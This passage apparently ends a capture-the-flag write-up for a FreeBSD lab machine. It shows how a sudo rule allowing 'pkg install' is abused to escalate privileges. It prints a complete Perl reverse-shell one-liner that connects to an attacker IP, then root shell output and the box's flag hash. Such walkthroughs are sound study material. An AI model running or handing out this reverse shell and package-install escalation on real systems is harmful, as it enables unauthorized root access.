Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

To change this login announcement, see motd(5).
To see the last 10 lines of a long file, use "tail filename". To see the
first 10 lines, use "head filename". To see new lines as they're appended
to a file, use "tail -f filename".
        -- Dru <genesis@istar.ca>
jamie@Schooled:~ $ ls
user.txt

By the enumeration of privileges for the jamie account, I’ve found out that he can run pkg install with *.

jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *

By this methodology I was able to create the package. Instead of the id command, I’ve used the reverse shell perl payload.

perl -e 'use Socket;$i="10.10.14.7";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And this allowed me to gain the root shell on the box!

# id  
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# ls
.cache
.cshrc
.history
.k5login
.lesshst
.login
.profile
.shrc
.ssh
root.txt
scripts
# cat root.txt
518af4d67b32bf39c4f0d07e40331cb3
# ip a
/bin/sh: ip: not found
# ipconfig
/bin/sh: ipconfig: not found

Post exploitation

N/A